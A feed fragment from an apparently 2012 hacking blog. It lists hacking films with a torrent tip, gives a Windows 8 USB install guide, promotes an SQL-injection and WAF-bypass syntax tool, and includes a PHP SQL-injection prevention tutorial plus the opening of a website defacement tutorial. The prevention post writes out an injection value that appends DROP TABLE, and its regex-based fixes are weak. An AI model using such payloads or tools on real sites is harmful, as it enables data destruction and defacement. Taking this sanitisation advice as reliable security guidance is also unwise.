isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-7762694502571351172</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: center;"&gt;&lt;b style="color: red;"&gt;Top Best Hacking Based Movies&lt;/b&gt;&lt;/div&gt;&lt;b style="color: red;"&gt;&lt;br /&gt;
&lt;/b&gt; &lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqlxtwPTzQKbiQFPdu0RJXcdiyJELO8zvYSu6sp0jUeP5y1Vsbk_x8Y3SBOUWziNKBMLob9N75VQpjYTh1brxnLhb0tjybLh9v1rrUbbckZs6cTFCuI_7FnveSRL3NZTPZVvsn90Q90Q/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqlxtwPTzQKbiQFPdu0RJXcdiyJELO8zvYSu6sp0jUeP5y1Vsbk_x8Y3SBOUWziNKBMLob9N75VQpjYTh1brxnLhb0tjybLh9v1rrUbbckZs6cTFCuI_7FnveSRL3NZTPZVvsn90Q90Q/s640/images.jpg" width="582" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b style="color: red;"&gt;&lt;br /&gt;
&lt;/b&gt; &lt;b style="color: red;"&gt;&lt;br /&gt;
&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Swordfish &lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
Track Down (aka Hackers 2)&lt;br /&gt;
&lt;br /&gt;
Antitrust&lt;br /&gt;
&lt;br /&gt;
Sneakers&lt;br /&gt;
&lt;br /&gt;
Die Hard 4: Live Free or Die Hard&lt;span style="color: red;"&gt; ( My Fav)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
The Net&lt;br /&gt;
&lt;br /&gt;
Hackers &lt;br /&gt;
&lt;br /&gt;
Tron&lt;br /&gt;
&lt;br /&gt;
The Italian Job (2003)&lt;br /&gt;
&lt;br /&gt;
The Matrix (Trilogy) &lt;span style="color: red;"&gt;( Old But Very Famous )&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;br /&gt;
&lt;br /&gt;
WarGames&lt;br /&gt;
&lt;br style="color: red;" /&gt;&lt;span style="color: red;"&gt;All These Movies are freely available on torrent just search download and watch it.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Keep Visting :- &lt;a href="http://www.indicyborg.blogspot.in/"&gt;&lt;b style="color: red;"&gt;indicyborg&lt;/b&gt;&lt;/a&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqlxtwPTzQKbiQFPdu0RJXcdiyJELO8zvYSu6sp0jUeP5y1Vsbk_x8Y3SBOUWziNKBMLob9N75VQpjYTh1brxnLhb0tjybLh9v1rrUbbckZs6cTFCuI_7FnveSRL3NZTPZVvsn90Q90Q/s72-c/images.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to Install Windows 8 From USB Pen Drive </title><link>http://indicyborg.blogspot.com/2012/08/how-to-install-windows-8-from-usb-pen.html</link><category>Tips And Tricks</category><category>Usb</category><category>Windows</category><author>noreply@blogger.com (Akshay)</author><pubDate>Thu, 30 Aug 2012 11:29:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-4791369428289573024</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLLRypPlZM_VZTdVW0xcxVoGaWTh1zZxC8IVMAOPYnCVuFDrRh_9IYZgnbn7Wzj0HVKriKwt4D6iW5zjSnVOjaIXvO4NVcJFo0N7iPbV19m955X2yjr9pmMGZL2ErUg1lCHRnH0aaaOg/s1600/win8-usb.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLLRypPlZM_VZTdVW0xcxVoGaWTh1zZxC8IVMAOPYnCVuFDrRh_9IYZgnbn7Wzj0HVKriKwt4D6iW5zjSnVOjaIXvO4NVcJFo0N7iPbV19m955X2yjr9pmMGZL2ErUg1lCHRnH0aaaOg/s640/win8-usb.jpg" width="632" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Microsoft’s Windows 8 Beta version is likely to be released in February 2012. Rumours for windows 8 new features are now at peak and everyone is eagerly waiting for it. Now only the developers preview of the windows 8 available on the internet which may have some bugs. But if you are very keen to adopt this OS then you can download it and can install it via DVD or USB Pen Drive. Windows 7 USB/DVD Download Tool enables you to install Windows 8 from USB drive.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Prerequisites:&lt;/b&gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Windows 8 ISO file.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Windows 7 USB/DVD Download Tool&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; At least 8 GB free space USB Pen Drive.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;System Requirements:&lt;/b&gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 1 Gigahertz or faster 32-bit or 64-bit processor&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 1 Gigabyte of RAM for 32-bit, 2 Gigabytes of RAM for 64-bit minimum&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; 16 Gigabyte hard drive for 32-bit systems, 20 Gigabyte for 64-bit systems&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Direct X 9 graphics card&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;How to Install Windows 8 From USB Pen Drive&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; First of all Download/Install Windows 8 ISO file and Windows 7 USB/DVD Tool in your computer.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnYa_qFkduStURcgOkpMSkFo3ZlSTmzQaOta_WVpjxOnSd3EDh6go976Gh-i6IYjV2rapmXMzJ5_nnjrtMTqmQCr6C7fzr9PO9NT_QzBLm0KV8fAIHHNNb8yywVrUjFP_cXIjhAS0P0Q/s1600/win8usb1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="496" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnYa_qFkduStURcgOkpMSkFo3ZlSTmzQaOta_WVpjxOnSd3EDh6go976Gh-i6IYjV2rapmXMzJ5_nnjrtMTqmQCr6C7fzr9PO9NT_QzBLm0KV8fAIHHNNb8yywVrUjFP_cXIjhAS0P0Q/s640/win8usb1.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Insert USB Pen Drive and Format it by 32 FAT System.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFjaw11S7GmHS35LaWGLcrYLHoUQGmoq3PkH5FaYc-VSmHlDPgNjElQXG4uU-axZccQDJxaJdvMr6rIDsF1-T3mXqnQzzmmSDROAvAeS_lO9FUpflNPDtYgbulW0EHzk0g2WvwMi57DQ/s1600/format-usb-key.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFjaw11S7GmHS35LaWGLcrYLHoUQGmoq3PkH5FaYc-VSmHlDPgNjElQXG4uU-axZccQDJxaJdvMr6rIDsF1-T3mXqnQzzmmSDROAvAeS_lO9FUpflNPDtYgbulW0EHzk0g2WvwMi57DQ/s640/format-usb-key.png" width="368" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;b&gt;Once the formatting has finished,Run Windows 7 USB Tool.&lt;br /&gt;
Now browse the windows 8 ISO file in it and click on Next button.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYGtMdzU9titfWOkaDKeYt4KC4QbzoBLGTZgdu1PeK0F-XRD_nYQau7wuEDcseKY_wb0wq5xYc26VrF-N-llXwopsX_ycEjZ0qLERKhAGlAJ_h96pAmLfRvZf_9Zqp0nznlgpdzNpBDw/s1600/win8usb3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYGtMdzU9titfWOkaDKeYt4KC4QbzoBLGTZgdu1PeK0F-XRD_nYQau7wuEDcseKY_wb0wq5xYc26VrF-N-llXwopsX_ycEjZ0qLERKhAGlAJ_h96pAmLfRvZf_9Zqp0nznlgpdzNpBDw/s640/win8usb3.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;Now the program will start copying files to USB Pen Drive and make it Bootable.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKA96xzXUAxnXbVgjw9SHaeB32I5UXbGGfrWcestJ0uWGV8aktdDaGAuET5p3IiioNNw0cOuO8NXVDY5LhOHvFwRTB_lRNf2O_VIlVATW7ik9h0VpX8toZAxu5eeCpEdvRFmwoJerT5A/s1600/win8usb4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKA96xzXUAxnXbVgjw9SHaeB32I5UXbGGfrWcestJ0uWGV8aktdDaGAuET5p3IiioNNw0cOuO8NXVDY5LhOHvFwRTB_lRNf2O_VIlVATW7ik9h0VpX8toZAxu5eeCpEdvRFmwoJerT5A/s640/win8usb4.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtN3FVd69iWvbUaQL-jPtjFZDv028DPSBIqzF7ogthVsLfS5hpq1Qrsnl1PMOAlF2xkbMlknh-fNwyQvS3Rtpo_kSmKxdOCkQ3NM42N_F32JflsFpD2h6d_CufJCNUGQU3riNKa_EKrA/s1600/win8usb5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtN3FVd69iWvbUaQL-jPtjFZDv028DPSBIqzF7ogthVsLfS5hpq1Qrsnl1PMOAlF2xkbMlknh-fNwyQvS3Rtpo_kSmKxdOCkQ3NM42N_F32JflsFpD2h6d_CufJCNUGQU3riNKa_EKrA/s640/win8usb5.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFpTXmsqZCZLibl4CKHaEEF__79-hjWBRzggqyZp_KIyS85XKXt7JwIZe-w3-vR4UI0HDt2y-Ldf6y0Ao1FBtfB6VcKiL63X7_i1G5xSLP-lnXVmk9nh6us5lujN-Vsqbw2WSbSyALJg/s1600/win8usb8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFpTXmsqZCZLibl4CKHaEEF__79-hjWBRzggqyZp_KIyS85XKXt7JwIZe-w3-vR4UI0HDt2y-Ldf6y0Ao1FBtfB6VcKiL63X7_i1G5xSLP-lnXVmk9nh6us5lujN-Vsqbw2WSbSyALJg/s640/win8usb8.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
After the copying all the files, remove pen drive and &lt;b style="color: red;"&gt;Restart&lt;/b&gt; your computer.&lt;br /&gt;
Now enter into the&lt;b style="color: red;"&gt; BIOS &lt;/b&gt;settings (usually by pressing F2).&lt;br /&gt;
Now go to the &lt;b style="color: red;"&gt;Boot&lt;/b&gt; tab and give first priority to&lt;b style="color: red;"&gt; USB Storage Device.&lt;/b&gt;&lt;br /&gt;
Now &lt;b style="color: red;"&gt;Save Changes&lt;/b&gt; and insert bootable USB Pen Drive in your computer.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://images2.store.microsoft.com/prod/clustera/framework/w7udt/1.0/en-us/Windows7-USB-DVD-tool.exe"&gt;&lt;b style="color: red;"&gt;Click Here to Download Windows 7 DVD/USB Download Tool&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;That’s it! Now the installation of Windows 8 will start. Do follow the normal steps on screen to install Windows 8 from USB Pen Drive.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Thanks For Reading&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;b&gt;Keep Visting :- &lt;a href="http://www.indicyborg.blogspot.in/"&gt;indicyborg&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLLRypPlZM_VZTdVW0xcxVoGaWTh1zZxC8IVMAOPYnCVuFDrRh_9IYZgnbn7Wzj0HVKriKwt4D6iW5zjSnVOjaIXvO4NVcJFo0N7iPbV19m955X2yjr9pmMGZL2ErUg1lCHRnH0aaaOg/s72-c/win8-usb.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Penetration Tool : Maxsqli syntex maker tool MySQL injection </title><link>http://indicyborg.blogspot.com/2012/08/penetration-tool-maxsqli-syntex-maker.html</link><category>Download</category><category>Hacking</category><category>Software</category><category>Sql Injection</category><author>noreply@blogger.com (Akshay)</author><pubDate>Thu, 30 Aug 2012 11:15:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-8518678468302657788</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVnl1TfJ2-jk9VEmxiZDK6xMvK65eDV24CJkPzSGf-vxJ2AjFk5mqUikROi5vgGJM2a_vCFyNHuwgE_fdXZR2YVBuVCQ3Ozdpcer-alJ2eGPleHcMVfAlY_pPwGxRQRKNUIJj6CDv4ug/s1600/maxsqli+syntax+builder%5B3%5D.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVnl1TfJ2-jk9VEmxiZDK6xMvK65eDV24CJkPzSGf-vxJ2AjFk5mqUikROi5vgGJM2a_vCFyNHuwgE_fdXZR2YVBuVCQ3Ozdpcer-alJ2eGPleHcMVfAlY_pPwGxRQRKNUIJj6CDv4ug/s640/maxsqli+syntax+builder%5B3%5D.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
This tool helps hackers/pentesters to create sql syntax. Its also help in waf bypass sql injection method.&lt;br /&gt;
&lt;br /&gt;
This is small program for those who hate typing :D.&lt;br /&gt;
it helps you build syntax for MySQL injection.&lt;br /&gt;
It supports basic MySQL injection and error based injection.&lt;br /&gt;
Just follow help inside the program and you won't have any problems.&lt;br /&gt;
If you find bugs then email on : maxonebt4@gmail.com.&lt;br /&gt;
Created By Danijel Maxa MaXoNe.Its a virus free program .Tool is compressed with free exe compressor and thats why it's detected as Pak_Generic.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Download : &lt;a href="http://maxsqli-syntax-maker.googlecode.com/files/MaxSQLSy.exe"&gt;&lt;span style="color: red;"&gt;from here&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;Video Tutorial :&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;object width="320" height="266" class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://2.gvt0.com/vi/QBx_6_lqbF4/0.jpg"&gt;&lt;param name="movie" value="http://www.youtube.com/v/QBx_6_lqbF4&amp;fs=1&amp;source=uds" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;param name="allowFullScreen" value="true" /&gt;&lt;embed width="320" height="266"  src="http://www.youtube.com/v/QBx_6_lqbF4&amp;fs=1&amp;source=uds" type="application/x-shockwave-flash" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;b&gt;Thanks For Reading&lt;/b&gt;
&lt;b&gt;
&lt;/b&gt; &lt;b&gt;Keep Visting :-&lt;a href="http://www.indicyborg.blogspot.in/"&gt;&lt;span style="color: red;"&gt; indicyborg&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVnl1TfJ2-jk9VEmxiZDK6xMvK65eDV24CJkPzSGf-vxJ2AjFk5mqUikROi5vgGJM2a_vCFyNHuwgE_fdXZR2YVBuVCQ3Ozdpcer-alJ2eGPleHcMVfAlY_pPwGxRQRKNUIJj6CDv4ug/s72-c/maxsqli+syntax+builder%5B3%5D.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Protecting Preventing Sql Injection Attack Protecting Websites</title><link>http://indicyborg.blogspot.com/2012/08/protecting-preventing-sql-injection.html</link><category>Anti Hacking</category><category>Sql Injection</category><author>noreply@blogger.com (Akshay)</author><pubDate>Thu, 30 Aug 2012 11:09:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-3011019029397173129</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv4RilWU1dxFz0NZy_Ye54pjVP0o85JBS-2dW1pcjcdar1HTlhRce7Q8Vc5BqB7i2Fte3yUxF12CWY56YkgtE7_WjT17rbLDC4ZtipdLysxjIsR2eZqkfQtfue5QOsho8un4V2Bnof8A/s1600/SQL-Injection-attack-still-spreading-84000-and-counting-SQLInjection1_1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv4RilWU1dxFz0NZy_Ye54pjVP0o85JBS-2dW1pcjcdar1HTlhRce7Q8Vc5BqB7i2Fte3yUxF12CWY56YkgtE7_WjT17rbLDC4ZtipdLysxjIsR2eZqkfQtfue5QOsho8un4V2Bnof8A/s400/SQL-Injection-attack-still-spreading-84000-and-counting-SQLInjection1_1.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span id="goog_1145872834"&gt;&lt;/span&gt;&lt;span id="goog_1145872835"&gt;&lt;/span&gt;Hello Friends in this tutorial we will discuss "Protection Of Website From sqli Attack" ,We All Know that Sqli Is Simple But Can Be Used As A Deadlier way so don't wrry if u don't know php, this is php friendly :)&lt;br /&gt;
&lt;b&gt;Lets Begin&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
There are usually two types of attacks :&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
1. URL based&lt;br /&gt;
2. Form based&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Major reason for both of them is 'badly architectured parametres'&lt;br /&gt;
many say That remove/rename or unlink the database configuration file, ofcourse this will work but this is NOT the solution, as it will halt the functionality of the site, your&lt;br /&gt;
Dynamic website will turn into just html pages in seconds, this is anologus to condition like, because of fear of robbery you don't buy anything for yourself too: P&lt;br /&gt;
what we will be doing is sanitizing and validating php variables, we have make sure That our critical global arrays like get, post, files, session, cookies etc allow data which we&lt;br /&gt;
Want them to store and nothing else, because we can't trust the fact that users will enter expected data. What we mean is suppose you have site script like this:&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;blabla.com/news.php?id=8&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Now what dis means is, in our "news.php" script (in global GET array) we have an array location $_GET[id] which contains the value which is being passed via URL,&lt;br /&gt;
In our case it is '8', what usually careless admins do is, pass on the get[] as it is to the database query which is to be executed so that proper content for id=8&lt;br /&gt;
Can be extracted from database and thrown on the user screen, SQL query can be like :&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;$news_query = "SELECT * FROM news WHERE NEWS ='".$_GET['id']."'";&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Now if we manipulate the URL and write 'something' in place of 'expected' integer then we may break normal query and can execute our own queries!&lt;br /&gt;
by breaking a query i mean, as in the above example we wrote&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;NEWS ='$_GET[id]'&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
if instead of expected id we write something like ==&amp;gt; &lt;b&gt;8'; eval_query; #&lt;/b&gt;&lt;br /&gt;
now what our new url is ==&amp;gt; &lt;b&gt;blabla.com/news.php?id=8'; eval_query; #&lt;/b&gt;&lt;br /&gt;
our new query becomes ==&amp;gt; &lt;b&gt;$news_query = "SELECT * FROM news WHERE NEWS ='8'; eval_query; #';&lt;/b&gt;&lt;br /&gt;
# is used to comment out query part after it, so now as u can see our "eval query" will be executed with normal expected query, eval query can be { DROP TABLE news} which will drop the "news"!&lt;br /&gt;
we can prevent this if instead of directly using &lt;b&gt;get[]&lt;/b&gt; variable in query we first validate them and then use them, by validating I mean, we make sure that URL variables contains&lt;br /&gt;
only that data which we want them to store and nothing else (in this case, we want integers for id values), this depend on the programming of the script, we may sometimes want alphabets(lower case or upper case or both),&lt;br /&gt;
numbers, some special characters etc . . . php gives us some function to do the same :&lt;br /&gt;
in this case we can use&lt;b&gt; "preg_replace"&lt;/b&gt; or maybe&lt;b&gt; 'ereg_replace'&lt;/b&gt;, i advertise preg_replace cause it has lot more functionality and is faster than ereg :) [you can search php.net if you want details about them]&lt;br /&gt;
so here we want only numbers in id fiels so we wil add this line before querying it :&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;$id = $_GET['id'];&lt;br /&gt;
$vald_id = preg_replace('#[^0-9]#i', '', $id);&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
first line is getting id variable from url via get and storing it in local variable $id, next we are cleaning it using preg_replace, so that it only contains numbers from 0-9 (if anything else is there it will replace it with a blank.space) and nothing else, we will use this cleaned variable&lt;br /&gt;
$vald_id in our query.&lt;br /&gt;
if we want some(defined) special characters along with alphabets we can write (in place of [^0-9]) :&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;preg_replace('#[^A-Za-z,.?$@!]#i', '', $id);&lt;/b&gt;&lt;br /&gt;
Now how to patch panels/forms of sites against sql&lt;br /&gt;
suppose there is an admin panel say&lt;br /&gt;
&lt;b style="color: red;"&gt;&lt;br /&gt;
blabla.com/admin/&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
hit [ctrl+u] view source, crawl source and search for [action=], cause every html form will be processin and submitting form elements using php scripts, if its written something like&lt;br /&gt;
&lt;b&gt;action=""&lt;/b&gt; ==&amp;gt; this means php script is calling itself and its processing is done in same script&lt;br /&gt;
if instead there ist written :&lt;br /&gt;
&lt;b&gt;action="login.php"&lt;/b&gt; [it can also call lol.php dosn't matter :P]&lt;br /&gt;
this means all form data goes to login.php processed there and then sent to database. Main culprit is login.php because it is not filtering variables correcty!&lt;br /&gt;
go to login.php, it wil be having lines looking like&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;$username = $_POST['user'];&lt;br /&gt;
$pass=$_POST['pass'];&lt;br /&gt;
$loginquery = "SELECT * FROM tbl_admin WHERE username ='$username' AND password = '$pass'";&lt;br /&gt;
$result = mysql_query($loginquery);&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
so we need to clean POST array elements before using them in a query&lt;br /&gt;
we will use preg_replace as before and we will also use&lt;br /&gt;
strip_tags as we don't want any html javascript elements in our form data,&lt;br /&gt;
basic syntax is ==&amp;gt; &lt;b&gt;strip_tags($variable)&lt;/b&gt;&lt;br /&gt;
if you want to allow certain tags like&lt;br /&gt;
then we can also do that as ==&amp;gt; &lt;b&gt;strip_tags($var, '&lt;/b&gt;&lt;br /&gt;
')&lt;br /&gt;
i intended to make a short tut but i failed :p hope you&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Thanks For Reading&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;b&gt;Keep Visiting :-&lt;a href="http://www.indicyborg.blogspot.in/"&gt; indicyborg&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv4RilWU1dxFz0NZy_Ye54pjVP0o85JBS-2dW1pcjcdar1HTlhRce7Q8Vc5BqB7i2Fte3yUxF12CWY56YkgtE7_WjT17rbLDC4ZtipdLysxjIsR2eZqkfQtfue5QOsho8un4V2Bnof8A/s72-c/SQL-Injection-attack-still-spreading-84000-and-counting-SQLInjection1_1.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>SQL Injection And Defacement For Beginners Complete Tutorial </title><link>http://indicyborg.blogspot.com/2012/08/sql-injection-and-defacement-for.html</link><category>Hacking</category><category>Sql Injection</category><category>Website Hacking</category><author>noreply@blogger.com (Akshay)</author><pubDate>Sun, 26 Aug 2012 10:54:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-5363896774447474243</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJGbJ-B8lggf68aNOqfLI9mSFye3KOcpQzHxUknF7ECUcee2UQkKVDTXJoL44xILg5pDc-8bQw3ZmalazVHu0eNZU8M0TtHXkYJSOZEHCjUfhX6Mqlx6N6GV-Q-j2GwDZEtmXmRsHslw/s1600/SQL+Injection+And+Defacement+For+Beginners+Complete+Tutorial.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJGbJ-B8lggf68aNOqfLI9mSFye3KOcpQzHxUknF7ECUcee2UQkKVDTXJoL44xILg5pDc-8bQw3ZmalazVHu0eNZU8M0TtHXkYJSOZEHCjUfhX6Mqlx6N6GV-Q-j2GwDZEtmXmRsHslw/s400/SQL+Injection+And+Defacement+For+Beginners+Complete+Tutorial.gif" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;1. What is SQL Injection?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2. What is Defacement ?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
A website defacement is an attack on a website that changes the visual appearance of the site. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own.&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;What do you need before you start with SQL Injection.&lt;/b&gt;&lt;br /&gt;
&lt;i style="color: blue;"&gt;&amp;nbsp;&lt;/i&gt;&lt;br /&gt;
&lt;i style="color: blue;"&gt;*You need Admin Finder ( to find admin panel from website )*&lt;br /&gt;
*SQL Injection Vulnerable Scanner*&lt;/i&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Admin Finder:&lt;/b&gt;&lt;br /&gt;
